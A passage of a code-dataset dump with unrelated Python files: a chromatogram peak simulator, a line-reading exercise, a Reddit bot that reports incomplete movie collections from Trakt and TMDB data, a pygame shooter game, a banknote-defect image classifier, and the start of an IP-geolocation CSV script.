if startpos >= 0 and endpos < datapoints:\n RefChrom[startpos:startpos+width] += peak\n peakpos_min = startpos\n peakpos_max = startpos+width\n else:\n if startpos < 0 and endpos < datapoints:\n RefChrom[0:endpos] += peak[-startpos:width]\n peakpos_min = 0\n peakpos_max = endpos\n if startpos >= 0 and endpos >= datapoints:\n RefChrom[startpos:datapoints] = peak[0:datapoints-startpos]\n peakpos_min = startpos\n peakpos_max = datapoints\n # poakpos_min, peakpos_maxを正規化\n NormalizedPeakPositions[i,0] = 
(peakpos_min + 0.5) / datapoints\n NormalizedPeakPositions[i,1] = (peakpos_max - 0.5) / datapoints\n NormalizedPeakPositions[i,2] = 1 # ピークデータクラスを表す1をハードコード\n\n # パルスカウントシミュレーションデータを作成\n simulated = PeakModel.simulate(dwelltime, RefChrom)\n Chrom = base + simulated\n\n return Chrom, RefChrom, NormalizedPeakPositions\n\nif __name__ == '__main__': \n CHROM, REF, Positions = PeakModel.chrom(1024, dwelltime=1, min_peaknumber=5, max_peaknumber=8, peak_dynamicrange=2, min_peakwidth=20, max_peakwidth=100)\n # CHROM, factor = PeakModel.normalize_and_spike(CHROM)\n RealPositions = Positions * 1024\n CHROM, factor = PeakModel.normalize(CHROM)\n REF, factor = PeakModel.normalize(REF)\n print(np.sort(RealPositions, axis=0))\n plt.plot(CHROM)\n plt.show()\n plt.plot(REF)\n plt.show()\n\n","sub_path":"peakmodel.py","file_name":"peakmodel.py","file_ext":"py","file_size_in_byte":7041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"162483055","text":"#!/usr/bin/python3\n\"\"\"module: 2-read_lines\"\"\"\n\n\ndef read_lines(filename=\"\", nb_lines=0):\n \"\"\"method: read_lines\"\"\"\n with open(filename, 'r', encoding='utf8') as f:\n nl = sum(1 for line in open(filename))\n if nb_lines <= 0 or nb_lines > nl:\n print(f.read(), end=\"\")\n else:\n for line in range(0, nb_lines):\n print(f.readline(), end=\"\")\n f.closed\n","sub_path":"0x0B-python-input_output/2-read_lines.py","file_name":"2-read_lines.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"270258900","text":"def trakt_movie_progress(mail):\n import datetime, time, json, requests, pprint\n from database import Tmdbmoviecollection, Tmdbcollectioninfo, Users\n from peewee import IntegrityError, DoesNotExist\n print(\"TRAKT MOVIE PROGRESS CALLED!\")\n try:\n sender = Users.get(Users.username == mail.author)\n # if sender.last_trakt_movie_progress_date >= (datetime.datetime.now() - datetime.timedelta(hours=1))\\\n # and not mail.author.name in [\"pcjonathan\", \"SwiftPanda16\"]:\n # mail.mark_as_read()\n # mail.reply(\"To help avoid rate limit issues/clogging the bot up, this feature is limited to once \"\n # \"per hour per user. Please try again soon. Thanks for your understanding\")\n # return\n # else:\n # sender.last_trakt_movie_progress_date = datetime.datetime.now()\n # sender.save()\n sender.last_trakt_movie_progress_date = datetime.datetime.now()\n sender.save()\n except DoesNotExist:\n sender = Users.create(username = mail.author, last_trakt_movie_progress_date = datetime.datetime.now())\n\n import trakt, trakt.users, trakt.errors\n from auth import AUTH\n trakt.core.OAUTH_TOKEN = AUTH[\"trakt\"][\"oauth_token\"]\n trakt.core.CLIENT_ID = AUTH[\"trakt\"][\"client_id\"]\n trakt.core.CLIENT_SECRET = AUTH[\"trakt\"][\"client_secret\"]\n trakt.core.APPLICATION_ID = AUTH[\"trakt\"][\"application_id\"]\n trakt.core.AUTH_METHOD = trakt.core.OAUTH_AUTH\n try:\n trakt_movies = trakt.users.User(mail.body).watched_movies\n # except trakt.errors.OAuthException:\n # print(\"Private. *facepalm*\")\n # mail.reply(\"Your trakt profile must be public for the watched movies list to be downloaded. Please make it \"\n # \"public then try again. You can always make it private again afterwards!\")\n # mail.mark_as_read()\n # return\n except trakt.errors.NotFoundException:\n print(\"User not found\")\n mail.reply(\"The user you have entered cannot be found. 
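`2-read_lines.py` above opens the file a second time inside `sum(1 for line in open(filename))` just to count lines — and never closes that handle — and the trailing `f.closed` merely reads an attribute rather than closing anything. One pass over the already-open handle keeps the same behavior (whole file when `nb_lines <= 0` or exceeds the line count):

```python
def read_lines(filename="", nb_lines=0):
    """Print the first nb_lines of a text file (the whole file if nb_lines <= 0)."""
    with open(filename, 'r', encoding='utf-8') as f:
        for i, line in enumerate(f):
            if 0 < nb_lines <= i:   # stop once nb_lines lines are printed
                break
            print(line, end="")
```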
Please try again, double-checking you have the \"\n \"username right.\")\n mail.mark_as_read()\n return\n watched = []\n for movie in trakt_movies:\n watched.append(movie.tmdb)\n print(\"Grabbed {} watched movies!\".format(len(watched)))\n import tmdbsimple\n from requests.exceptions import HTTPError\n tmdbsimple.API_KEY = AUTH[\"api\"][\"tmdb\"]\n complete = []\n incomplete = []\n responses = [\"\"]\n while len(watched) > 0:\n print(\"Debug: {} movies left to process\".format(len(watched)))\n if len(watched) == 1072:\n print(51)\n movie = watched.pop(0)\n try:\n m = Tmdbmoviecollection.get(Tmdbmoviecollection.movieid == movie)\n if m.lastupdated < (datetime.datetime.now() - datetime.timedelta(weeks=1)) or len(watched) == 1071:\n c = tmdbsimple.Movies(movie).info()[\"belongs_to_collection\"]\n if c is None:\n m.collectionid = None\n else:\n m.collectionid = c[\"id\"]\n m.lastupdated = datetime.datetime.now()\n m.save()\n time.sleep(0.5)\n m = m.collectionid\n except (DoesNotExist, HTTPError) as e:\n print(e)\n try:\n m = tmdbsimple.Movies(movie).info()[\"belongs_to_collection\"]\n except requests.exceptions.HTTPError as e:\n if e.response.status_code == 404:\n continue\n else:\n raise requests.HTTPError\n if m is not None:\n m = m[\"id\"]\n Tmdbmoviecollection.create(movieid = movie, collectionid = m)\n time.sleep(0.5)\n except Exception as e:\n print(e)\n if m is None:\n continue\n\n else:\n\n #collection = tmdbsimple.Collections(m[\"belongs_to_collection\"][\"id\"]).info()\n try:\n col = Tmdbcollectioninfo.get(Tmdbcollectioninfo.collectionid == m)\n if col.lastupdated < (datetime.datetime.now() - datetime.timedelta(weeks=1)):\n collection = tmdbsimple.Collections(m).info()\n col.data = json.dumps(collection)\n col.lastupdated = datetime.datetime.now()\n col.save()\n time.sleep(0.5)\n collection = json.loads(col.data)\n except DoesNotExist:\n collection = tmdbsimple.Collections(m).info()\n Tmdbcollectioninfo.create(collectionid=m, data=json.dumps(collection))\n for part in collection[\"parts\"]:\n try:\n Tmdbmoviecollection.create(movieid=part[\"id\"], collectionid=collection[\"id\"])\n except IntegrityError:\n pass\n time.sleep(0.5)\n\n\n collection[\"complete\"] = True\n for part in collection[\"parts\"]:\n if part[\"release_date\"] == None:\n part[\"release_date\"] = \"None\"\n if part[\"id\"] == movie:\n part[\"watched\"] = True\n elif part[\"id\"] in watched:\n part[\"watched\"] = True\n watched.pop(watched.index(part[\"id\"]))\n else:\n part[\"watched\"] = False\n if part[\"release_date\"] != \"None\":\n if datetime.datetime.strptime(part[\"release_date\"], \"%Y-%m-%d\").date() <= datetime.date.today():\n collection[\"complete\"] = False\n\n collection[\"parts\"] = sorted(collection[\"parts\"], key=lambda part: part['release_date'])\n if collection[\"complete\"]:\n complete.append(collection)\n else:\n incomplete.append(collection)\n\n incomplete = sorted(incomplete, key=lambda col: col['name'])\n for col in incomplete:\n col_response = \"##{}\\n\\n\".format(col[\"name\"])\n for part in col[\"parts\"]:\n if part[\"watched\"]:\n col_response += \"* {}\\n\".format(part[\"title\"])\n elif part[\"release_date\"] is \"None\" or datetime.datetime.strptime(part[\"release_date\"], \"%Y-%m-%d\").date() \\\n <= \\\n datetime.date.today():\n col_response += \"* {}: **NOT WATCHED**\\n\".format(part[\"title\"])\n else:\n col_response += \"* {}: Not Released\\n\".format(part[\"title\"])\n col_response += \"\\n\\n\"\n if len(responses[-1] + col_response) <= 9770:\n responses[-1] += col_response\n 
else:\n responses.append(col_response)\n\n for i in range(len(responses)):\n if len(responses) == 1:\n mail.reply(\"Here is the list of incomplete movie collections:\\n\\n\"\n + responses[i] + \"Watch history taken from user's trakt account. \"\n \"Movie collection data from TheMovieDatabase\")\n else:\n mail.reply(\"Here is the list of incomplete movie collections. There are too many to list in a single \"\n \"message so they have been split up. Part {}/{}:\\n\\n\".format((i + 1), len(responses))\n + responses[i] + \"Watch history taken from user's trakt account. \"\n \"Movie collection data from TheMovieDatabase\")\n mail.mark_read()\n\n # if collection[\"complete\"]:\n # print(\"##### {}\".format(collection[\"name\"]))\n # for part in collection[\"parts\"]:\n # if datetime.datetime.strptime(part[\"release_date\"], \"%Y-%m-%d\").date() <= datetime.date.today():\n # print(part[\"title\"])\n # else:\n # print(\"{}: Not Released\".format(part[\"title\"]))\n # else:\n # print(\"##### {} - Incomplete!!\".format(collection[\"name\"]))\n # for part in collection[\"parts\"]:\n # if part[\"watched\"]:\n # print(part[\"title\"])\n # elif datetime.datetime.strptime(part[\"release_date\"], \"%Y-%m-%d\").date() <= datetime.date.today():\n # print(part[\"title\"] + \": NOT WATCHED\")\n # else:\n # print(\"{}: Not Released\".format(part[\"title\"]))\n #\n # print(\"\\n\")\n # print(\"Debug: {} movies left to process\".format(len(watched)))\n # time.sleep(0.5)\n #\n # unwatched = []\n # for col in collections:\n # for part in col[\"parts\"]:\n # if datetime.datetime.strptime(part[\"release_date\"], \"%Y-%m-%d\").date() <= datetime.date.today() and not \\\n # part[\"watched\"]:\n # unwatched.append(part)\n\n\n","sub_path":"trakt_movie_progress.py","file_name":"trakt_movie_progress.py","file_ext":"py","file_size_in_byte":8826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"590410858","text":"'''\n作者: zhangzongyan\n时间: 18-4-18\n'''\nimport pygame\nfrom pygame.locals import *\nimport plane\nimport enemy\nimport bullet\n\nSMALL_ENEMY_NUM = 15\nMID_ENEMY_NUM = 10\nBIG_ENEMY_NUM = 5\nBULLET_NUM = 15\nBUJI_NUM = 2\n\n# 创建指定个数的小型敌机 并加入组内\ndef add_small_enemy(group1, group2, num, bg_rect):\n for i in range(num):\n each = enemy.SmallEnemy(bg_rect)\n group1.add(each)\n group2.add(each)\n\n# 创建指定个数的中型敌机 并加入组内\ndef add_mid_enemy(group1, group2, num, bg_rect):\n for i in range(num):\n each = enemy.MidEnemy(bg_rect)\n group1.add(each)\n group2.add(each)\n\n# 创建指定个数的大型敌机 并加入组内\ndef add_big_enemy(group1, group2, num, bg_rect):\n for i in range(num):\n each = enemy.BigEnemy(bg_rect)\n group1.add(each)\n group2.add(each)\n#创建指定个数的补给 并加入敌机组\ndef add_buji_enemy(group1, group2, num, bg_rect):\n for i in range(num):\n each = enemy.BuJi(bg_rect)\n group1.add(each)\n group2.add(each)\n# 改变敌机组内敌机速度\ndef speed_increace(group, inc):\n for e in group:\n e.speed += inc\ndef main():\n # 初始化游戏\n pygame.init()\n life_image = pygame.image.load(\"../images/life.png\")\n life_rect = life_image.get_rect()\n life_num = 3\n # 游戏窗口\n screen = pygame.display.set_mode((480, 680))\n # bg图片\n bg_img = pygame.image.load(\"../images/background.png\").convert_alpha()\n\n # 回去背景的宽度和高度\n width = bg_img.get_rect().width\n height = bg_img.get_rect().height\n\n # 标题\n pygame.display.set_caption(\"飞机大战--Bata\")\n #设置重新开始按钮和结束按钮\n game_over = pygame.image.load(\"./images/gameover.png\").convert_alpha()\n game_rect = game_over.get_rect()\n\n again_image = 
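The reply loop in the trakt record above packs per-collection blocks into chunks of at most 9,770 characters, leaving headroom under Reddit's 10,000-character comment limit for the header and footer text it prepends. The same packing as a standalone helper (the 9,770 margin is the record's own choice):

```python
def pack_messages(blocks, limit=9770):
    """Greedily pack text blocks into messages no longer than `limit` chars."""
    messages = ['']
    for block in blocks:
        if len(messages[-1]) + len(block) <= limit:
            messages[-1] += block   # still fits in the current message
        else:
            messages.append(block)  # start a new message
    return messages

parts = pack_messages(['a' * 6000, 'b' * 5000, 'c' * 100])
assert [len(p) for p in parts] == [6000, 5100]
```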
pygame.image.load(\"./images/again.png\").convert_alpha()\n again_rect = again_image.get_rect()\n # 实例化我方飞机\n myplane = plane.MyPlane(bg_img.get_rect())\n\n #控制图片切换速度\n delay = 0\n change_img = False\n\n # 敌机组\n enemies_group = pygame.sprite.Group()\n # 小敌机组\n smallEny_group = pygame.sprite.Group()\n # 实例化小型机-->15个\n add_small_enemy(smallEny_group, enemies_group, SMALL_ENEMY_NUM, bg_img.get_rect())\n\n # 中敌机组\n midEny_group = pygame.sprite.Group()\n add_mid_enemy(midEny_group, enemies_group, MID_ENEMY_NUM, bg_img.get_rect())\n\n # 大敌机组\n bigEny_group = pygame.sprite.Group()\n add_big_enemy(bigEny_group, enemies_group, BIG_ENEMY_NUM, bg_img.get_rect())\n #补给\n buji_group = pygame.sprite.Group()\n add_buji_enemy(buji_group, enemies_group, BUJI_NUM, bg_img.get_rect())\n\n # 销毁索引\n mid_index = 0\n big_index = 0\n me_index = 0\n bullet_index = 0\n\n #print(myplane.rect.width)\n #print(myplane.rect.midtop)\n\n # 实例化子弹对象\n bullet_group = pygame.sprite.Group()\n bulletlist = []\n for i in range(BULLET_NUM):\n b = bullet.Bullet(myplane.rect.midtop)\n bullet_group.add(b)\n bulletlist.append(b)\n\n # 设置刷新速度\n clock = pygame.time.Clock()\n\n # 显示分数\n score = 0\n # font对象\n fnt = pygame.font.Font('../font/myfont.ttf', 24)\n\n # 背景音乐\n pygame.mixer.init()\n pygame.mixer.music.load(\"../sound/game_music.ogg\")\n pygame.mixer.music.play(-1)\n\n # 暂停播放按钮\n pause_nor_img = pygame.image.load(\"../images/pause_nor.png\")\n pause_pressed_img = pygame.image.load(\"../images/pause_pressed.png\")\n resume_nor_img = pygame.image.load(\"../images/resume_nor.png\")\n resume_pressed_img = pygame.image.load(\"../images/resume_pressed.png\")\n pause_img = pause_nor_img\n pause_rect = pause_img.get_rect()\n pause_rect.left, pause_rect.top = (width-pause_rect.width -5, 5)\n pause_flag = False\n\n # 等级\n level = 1\n\n # 炸弹\n bomb_img = pygame.image.load(\"../images/bomb.png\").convert_alpha()\n bomb_rect = bomb_img.get_rect()\n bomb_rect.left, bomb_rect.top = (5, height-bomb_rect.height-5)\n bom_num = 3\n fnt2 = pygame.font.Font('../font/myfont.ttf', 48)\n # 生命数量\n life_image = pygame.image.load(\"../images/life.png\")\n life_rect = life_image.get_rect()\n life_num = 3\n\n running = True\n while running:\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n exit(1)\n elif event.type == MOUSEBUTTONDOWN:\n # 点击鼠标左键 并在按钮区域\n if event.button == 1 and pause_rect.collidepoint(event.pos):\n pause_flag = not pause_flag\n elif event.type == MOUSEMOTION:\n if pause_rect.collidepoint(event.pos):\n if pause_flag:\n # 暂停\n pause_img = resume_pressed_img\n else:\n pause_img = pause_pressed_img\n else:\n if pause_flag:\n pause_img = resume_nor_img\n else:\n pause_img = pause_nor_img\n elif event.type == KEYDOWN:\n if event.key == K_SPACE:\n # 放炸弹\n if bom_num > 0:\n for e in enemies_group:\n\n if e.alive and e.rect.top > 0:\n if e not in buji_group:\n e.alive = False\n bom_num -= 1\n else:\n bom_num = 0\n\n\n\n\n\n # 画背景图片\n screen.fill((255, 255, 255))\n screen.blit(bg_img, bg_img.get_rect())\n if not pause_flag:\n # 判断等级\n if level == 1 and score > 50000:\n level = 2\n # 多5个小敌机 2中敌机 1大敌机\n add_small_enemy(smallEny_group, enemies_group, 5, bg_img.get_rect())\n add_mid_enemy(midEny_group, enemies_group, 2, bg_img.get_rect())\n add_big_enemy(bigEny_group, enemies_group, 1, bg_img.get_rect())\n # 小敌机速度+2 中敌机速度加1\n speed_increace(smallEny_group, 2)\n speed_increace(midEny_group, 1)\n elif level == 2 and score > 150000:\n level = 3\n # 多5个小敌机 2中敌机 1大敌机\n add_small_enemy(smallEny_group, enemies_group, 10, 
bg_img.get_rect())\n add_mid_enemy(midEny_group, enemies_group, 5, bg_img.get_rect())\n add_big_enemy(bigEny_group, enemies_group, 2, bg_img.get_rect())\n # 小敌机速度+2 中敌机速度加1\n speed_increace(smallEny_group, 3)\n speed_increace(midEny_group, 2)\n\n # 频繁按键\n pressedkeys = pygame.key.get_pressed()\n if pressedkeys[K_LEFT] or pressedkeys[K_a]:\n myplane.move_left()\n elif pressedkeys[K_RIGHT] or pressedkeys[K_d]:\n myplane.move_right()\n elif pressedkeys[K_UP] or pressedkeys[K_w]:\n myplane.move_up()\n elif pressedkeys[K_DOWN] or pressedkeys[K_s]:\n myplane.move_down()\n\n # 子弹重置\n if not delay % 2:\n bulletlist[bullet_index].reset(myplane.rect.midtop)\n bullet_index = (bullet_index + 1) % BULLET_NUM\n\n # 绘制子弹\n for d in bullet_group:\n if d.alive:\n d.move()\n screen.blit(d.image, d.rect)\n # 子弹是否与敌机发生碰撞\n colleny = pygame.sprite.spritecollide(d, enemies_group, False, pygame.sprite.collide_mask)\n for e in colleny:\n if e in smallEny_group:\n score += 1000\n e.alive = False\n elif e in buji_group:\n e.alive = True\n else:\n e.energy -= 1\n if e.energy == 0:\n if e in bigEny_group:\n score += 10000\n else:\n score += 5000\n e.alive = False\n d.alive = False\n\n # 绘制敌机\n for e in bigEny_group:\n if e.alive:\n e.move()\n if delay % 4 == 0:\n screen.blit(e.image1, e.rect)\n else:\n screen.blit(e.image2, e.rect)\n # 绘制血槽\n pygame.draw.line(screen, (0,0,0), (e.rect.left, e.rect.top-5), \\\n (e.rect.right, e.rect.top-5), 2)\n # 余血\n current_egy = e.energy / enemy.BigEnemy.energy\n if current_egy < 0.2:\n color_paint = (255, 0, 0)\n else:\n color_paint = (0, 255, 0)\n pygame.draw.line(screen, color_paint, (e.rect.left, e.rect.top - 5), \\\n (e.rect.left + e.rect.width * current_egy, e.rect.top - 5), 2)\n\n else:\n screen.blit(e.destroy_image[big_index], e.rect)\n if delay % 3 == 0:\n big_index += 1\n if big_index == 6:\n big_index = 0\n e.reset()\n\n for e in midEny_group:\n if e.alive:\n e.move()\n screen.blit(e.image, e.rect)\n # 绘制血槽\n pygame.draw.line(screen, (0, 0, 0), (e.rect.left, e.rect.top - 5), \\\n (e.rect.right, e.rect.top - 5), 2)\n # 余血\n current_egy = e.energy / enemy.MidEnemy.energy\n if current_egy < 0.2:\n color_paint = (255,0,0)\n else:\n color_paint = (0,255,0)\n pygame.draw.line(screen, color_paint, (e.rect.left, e.rect.top - 5), \\\n (e.rect.left+e.rect.width * current_egy, e.rect.top - 5), 2)\n else:\n screen.blit(e.destroy_image[mid_index], e.rect)\n if delay % 3 == 0:\n mid_index += 1\n if mid_index == 4:\n mid_index = 0\n e.reset()\n for e in smallEny_group:\n if e.alive:\n e.move()\n screen.blit(e.image, e.rect)\n else:\n e.reset()\n for e in buji_group:\n if e.alive:\n e.move()\n screen.blit(e.image, e.rect)\n else:\n e.reset()\n\n # 检测敌机是否撞击我方飞机\n collide_plane = pygame.sprite.spritecollide(myplane, enemies_group, False, \\\n pygame.sprite.collide_mask)\n if collide_plane:\n # 发生碰撞\n for e in collide_plane:\n if e in buji_group:\n e.alive = False\n myplane.alive = True\n bom_num += 1\n else:\n e.alive = False\n myplane.alive = False\n\n myrender = fnt.render(\"Score:%d\" % score, True, (234, 222, 56))\n # 显示文字\n screen.blit(myrender, (5, 5))\n\n # 显示等级\n myrender = fnt.render(\"Level:%d\" % level, True, (234,222,56))\n screen.blit(myrender, (width-myrender.get_rect().width-5, height-myrender.get_rect().height-5))\n\n # 显示炸弹\n screen.blit(bomb_img, bomb_rect)\n myrender = fnt2.render(\"x %d\" % bom_num, True, (234,222,56))\n screen.blit(myrender, (bomb_rect.right+2, bomb_rect.top))\n\n if myplane.alive:\n if not change_img:\n screen.blit(myplane.image1, myplane.rect)\n 
else:\n screen.blit(myplane.image2, myplane.rect)\n else:\n # 销毁\n screen.blit(myplane.destroy_images[me_index], myplane.rect)\n if not delay % 10:\n me_index += 1\n if me_index == 4:\n\n life_num -= 1\n me_index = 0\n myplane.reset()\n\n if life_num == 0:\n game_rect.left, game_rect.top = (width-game_rect.width) / 2, 400\n screen.blit(game_over, game_rect)\n again_rect.left, again_rect.top = (width-again_rect.width) / 2, 300\n screen.blit(again_image, again_rect)\n if life_num:\n for i in range(life_num):\n screen.bilt(life_image,(width - 10 - (i + 1) * life_rect.width, \\\n height - 10 - life_rect.height))\n\n # 绘制暂停开始\n screen.blit(pause_img, pause_rect)\n\n delay += 1\n if delay % 5 == 0:\n change_img = True\n else:\n change_img = False\n pygame.display.update()\n clock.tick(60)\n\nif __name__ == '__main__':\n main()","sub_path":"zhangqi/FeiJi/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":13569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"100129597","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport sys\nimport os\nimport glob\nimport shutil\nimport fnmatch\nimport ntpath\nimport re\nimport cv2\nimport csv\nimport numpy as np \nimport pandas as pd\nfrom torchvision import datasets\nimport torchvision.transforms as transforms\nfrom torchvision.datasets import ImageFolder\nfrom torch.utils.data import DataLoader\nfrom PIL import ImageFile\nimport torch\nimport torch.nn as nn\nfrom model import MyNet\nfrom matplotlib import pyplot as plt\nfrom yattag import Doc\n#%matplotlib inline\nregex = re.compile(r'(\\d+)( \\((.+)\\))*.jpg')\n\n#classes for defect banknote\nclasses = {\n 'Dot': 'dot',\n 'Miss_print': 'miss_print',\n 'Over_ink': 'over_ink',\n 'Set_off': 'set_off',\n 'Under_ink': 'under_ink',\n 'Wiping': 'wiping',\n}\n\nclass_names = ['dot', 'miss_print', 'over_ink', 'set_off', 'under_ink', 'wiping']\n\n# instantiate the CNN\nuse_cuda = torch.cuda.is_available()\nlayer_sizes = [512, 256, 128]\nmodel = MyNet(output_size=6, layer_sizes=layer_sizes)\nif use_cuda:\n model = model.cuda()\n\nmodel.load_state_dict(torch.load('model/model_resnet101_512_256_128_back.pt', map_location=torch.device('cpu')))\n\n\n# ### Get the directory path from the argument\n\nif __name__ == \"__main__\":\n dir_path = sys.argv[1].strip()\n#in put the directory path\n#dir_path = input('Enter the images directory path: ').strip()\n\n#print(dir_path)\n#delete the output folder if exists\nfor files in os.listdir(dir_path):\n if files == 'output':\n shutil.rmtree(os.path.join(dir_path, files))\n #shutil.rmtree(os.path.join(os.getcwd()+'/' + dir_path, files))\n\n print('The output folder exist, and deleted.')\n\n\n# ### Combine images side by side\ndef merge_images():\n #create output folder\n os.mkdir(dir_path + '/output')\n \n #create classes folder\n for c in class_names:\n os.mkdir(dir_path +'/output/'+c)\n\n img_id = 0\n files = [f for f in glob.glob(dir_path + '/*.jpg')]\n files = [f for f in files if '_std' not in f]\n files.sort()\n #print (files)\n for fpath in files:\n #fname = fpath.split('/')[-1]\n ntpath.basename(fpath)\n head, tail = ntpath.split(fpath)\n fname = tail\n #print(fname)\n if (fname == 'StandardFront.jpg'):\n continue\n std_fpath = fpath[:-4]+'_std.jpg'\n #Read defect and standard images and combine them\n im1 = cv2.imread(fpath)\n im2 = cv2.imread(std_fpath)\n im3 = cv2.hconcat([im1, im2])\n\n img_id += 1\n new_fpath = dir_path + '/output/'+str(img_id)+'.jpg'\n\n cv2.imwrite(new_fpath, im3)\n\n\n# ### Predict 
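In the 飞机大战 game loop above, the remaining lives are drawn with `screen.bilt(...)`, which raises `AttributeError` (pygame surfaces only have `blit`) on the first frame once `life_num` is set, and the game-over/again images load from `./images/` while every other asset uses `../images/`, so one of the two path conventions is presumably wrong. The corrected life-drawing branch, reusing the names already defined in the record:

```python
# drop-in replacement for the `if life_num:` branch of the main loop
if life_num:
    for i in range(life_num):
        screen.blit(life_image,                        # was: screen.bilt(...)
                    (width - 10 - (i + 1) * life_rect.width,
                     height - 10 - life_rect.height))
```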
the image class\n\ndef predict_image(model, img_path, use_cuda, class_names):\n # load the image and return the predicted breed\n\n mytransform = transforms.Compose([transforms.ToPILImage(), transforms.Resize((224,224)), transforms.ToTensor(), transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])\n np_img = cv2.imread(img_path)\n #plt.imshow(np_img)\n\n tensor_img = mytransform(np_img)\n tensor_img = tensor_img.unsqueeze(0) # create tensor with batch dimension\n if use_cuda:\n tensor_img = tensor_img.cuda()\n \n model.eval()\n output = model(tensor_img)\n output = output.cpu().detach().numpy()\n pred_idx = np.argmax(output)\n return class_names[pred_idx]\n\n\n# ### Predict each file and move to respective folder\n# \n\ndef classify_image():\n file_lists = [f for f in glob.glob(dir_path +'/output/*.jpg')]\n for file_path in file_lists:\n #file_name = file_path.split('/')[-1]\n ntpath.basename(file_path)\n head, tail = ntpath.split(file_path)\n file_name = tail\n print('Classifying: '+file_name)\n cs = str(predict_image(model, file_path, use_cuda, class_names)) \n \n for c in class_names:\n \n if cs == c:\n shutil.move(file_path, dir_path +'/output/'+c+'/'+file_name)\n\n\n\nmerge_images()\nclassify_image()\n\n\n#Count file in folders and put in dictionary\nclass_output = {}\nfor c in class_names:\n dir_name = dir_path + '/output/'+c+'/'\n file_count = glob.glob(dir_name+'*.*')\n #print(c,len(file_count))\n class_output[c] = len(file_count)\n#print(class_output) \n\n#write dictionary file to CSV\ncsv_file = 'output.csv'\ncsv_columns = ['Type', 'Total Number']\n\nwith open(csv_file, 'w') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=csv_columns)\n writer.writeheader()\n for key, value in class_output.items():\n writer.writerow({'Type': key, 'Total Number': value})\n\n\n\n#Read CSV and plot bar graph\ndf = pd.read_csv('output.csv', sep=',')\nprint(df)\n\ndf.set_index('Type').plot.bar(legend=None)\n\nfor i, val in enumerate(df['Total Number'].values):\n plt.text(i, val+0.1, df['Total Number'][i])\n\nplt.title('Unfit Back Banknotes Classification by Number')\nplt.xlabel('Classifications')\nplt.xticks(rotation=0)\nplt.ylabel('Number of Notes')\nplt.savefig(dir_path+'/output/output.png')\n\n\nprint('Classification done!, the images are sorted to the respective folder')\n\n\n# ### Generate the HTML ouput\n\n\ndoc, tag, text = Doc().tagtext()\n\n\nwith tag('div', id='photo_container'):\n doc.stag('img', src='output.png', klass='photo')\n doc.stag('br')\nwith tag('h2'):\n text('Classification Ouput')\nwith tag('a', href='./dot/'):\n text('Output folder for DOT')\n doc.stag('br')\nwith tag('a', href='./miss_print/'):\n text('Output folder for Miss print')\n doc.stag('br')\nwith tag('a', href='./over_ink/'):\n text('Output folder for Over ink')\n doc.stag('br')\nwith tag('a', href='./set_off/'):\n text('Output folder for Set off')\n doc.stag('br')\nwith tag('a', href='./under_ink/'):\n text('Output folder for Under ink')\n doc.stag('br')\nwith tag('a', href='./wiping/'):\n text('Output folder for Wiping')\n doc.stag('br')\n \n\nf = open(dir_path+'/output/output.html','w')\n\nmessage = '''\n\n'''+ doc.getvalue() + '''\n'''\n\nf.write(message)\nf.close()\n\n\nprint('The report is generated to output.html')\n\n","sub_path":"classify_notes_back.py","file_name":"classify_notes_back.py","file_ext":"py","file_size_in_byte":6070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"28080763","text":"import csv\nimport 
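`predict_image` in the classifier record above normalizes with ImageNet RGB means/stds but feeds the transform a `cv2.imread` array, which is BGR; if the model was trained on RGB-normalized inputs, converting before the transform keeps the channels aligned with those constants (if it was trained on BGR images, the training pipeline should change instead — a judgment the record does not settle). A sketch with the conversion and the forward pass wrapped in `torch.no_grad()`:

```python
import cv2
import numpy as np
import torch
import torchvision.transforms as transforms

mytransform = transforms.Compose([
    transforms.ToPILImage(),
    transforms.Resize((224, 224)),
    transforms.ToTensor(),
    transforms.Normalize(mean=[0.485, 0.456, 0.406],
                         std=[0.229, 0.224, 0.225]),
])

def predict_image(model, img_path, use_cuda, class_names):
    np_img = cv2.cvtColor(cv2.imread(img_path), cv2.COLOR_BGR2RGB)  # BGR -> RGB
    tensor_img = mytransform(np_img).unsqueeze(0)  # add the batch dimension
    if use_cuda:
        tensor_img = tensor_img.cuda()
    model.eval()
    with torch.no_grad():                          # inference only, no gradients
        output = model(tensor_img).cpu().numpy()
    return class_names[int(np.argmax(output))]
```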
sys\nfrom ipInfo import *\n\nMANAGEMENT = \"/home/ec2-user/GEMCloud_Visualization/management\"\n\ndef main():\n update_tables()\n update_latLon_loc()\n\n\n\"\"\"\n Get each ip_address of user information from ip_loc.csv dataset\n\"\"\"\ndef get_ip_list_database():\n ip_list = []\n with open(MANAGEMENT+'/datasheets/ipGeoDatabase/ip_loc.csv', 'rb') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n if row[0] not in ip_list:\n ip_list.append(row[0])\n return ip_list\n\n\"\"\"\n Get each latLon of user information from ip_latLon.csv dataset\n\"\"\"\ndef get_latLon_list_from_ip_loc():\n latLon_list = []\n with open(MANAGEMENT+'/datasheets/ipGeoDatabase/ip_latLon.csv', 'rb') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n latLon_list.append(row[1])\n return latLon_list\n\n\n\"\"\"\n Get each location of user information from ip_loc.csv dataset\n\"\"\"\ndef get_loc_list_database():\n loc_list = []\n with open(MANAGEMENT+'/datasheets/ipGeoDatabase/ip_loc.csv', 'rb') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n loc_list.append(row[1])\n return loc_list\n\n\n\"\"\"\n Get each latLon of user information from user_info.csv dataset\n\"\"\"\ndef get_latLon_list_database():\n latLon_list = []\n with open(MANAGEMENT+'/datasheets/ipGeoDatabase/latLon_loc.csv', 'rb') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n# print row[0]\n if row[0] not in latLon_list:\n latLon_list.append(row[0])\n return latLon_list\n\n\n\n\"\"\"\n Get each ip_address of user information from user_info.csv 